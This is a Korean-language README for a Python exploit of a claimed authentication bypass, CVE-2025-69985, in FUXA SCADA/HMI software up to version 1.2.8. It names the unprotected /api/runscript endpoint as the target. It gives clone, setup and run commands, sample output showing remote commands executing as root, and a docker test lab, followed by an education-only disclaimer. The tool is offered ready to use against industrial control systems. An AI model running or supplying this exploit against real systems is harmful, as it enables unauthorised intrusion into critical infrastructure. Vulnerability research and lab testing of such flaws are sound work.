
FUXA SCADA 소프트웨어를 대상으로 하는 CVE-2025-69985용 Python 익스플로잇입니다. /api/runscript 엔드포인트에 조작된 JSON 페이로드를 전송하여 인증을 우회하고 원격 코드 실행을 달성합니다.
이 Python 익스플로잇은 FUXA(웹 기반 SCADA/HMI 소프트웨어) 버전 ≤ 1.2.8의 심각한 인증 우회 취약점인 CVE-2025-69985를 대상으로 합니다. 보호되지 않은 /api/runscript 엔드포인트에 Node.js 코드가 포함된 조작된 JSON 페이로드를 전송하여 FUXA 프로세스로 원격 명령 실행을 달성하며, 응답에서 전체 stdout/stderr를 동기적으로 캡처합니다.
[!NOTE] 프로젝트 종속성을 위한 깨끗하고 격리된 환경을 보장하려면 Python의
venv모듈을 사용하는 것이 좋습니다.
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
git clone https://github.com/joshuavanderpoll/CVE-2025-69985.git
cd CVE-2025-69985
python -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
python3 CVE-2025-69985.py -u http://localhost:1881/ -c whoami
Target : http://localhost:1881
Command: whoami
[*] Preparing payload → executing: whoami
[*] Sending exploit request to /api/runscript ...
[*] Response status: 200
[+] Command executed successfully (CVE-2025-69985 bypass)!
=== COMMAND OUTPUT ===
"root\n"
======================
======================================================================
Exploit completed!.
======================================================================
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:1881/

이 도구는 교육 및 연구 목적으로만 제공됩니다. 제작자는 도구로 인한 오용 또는 손해에 대해 어떠한 책임도 지지 않습니다.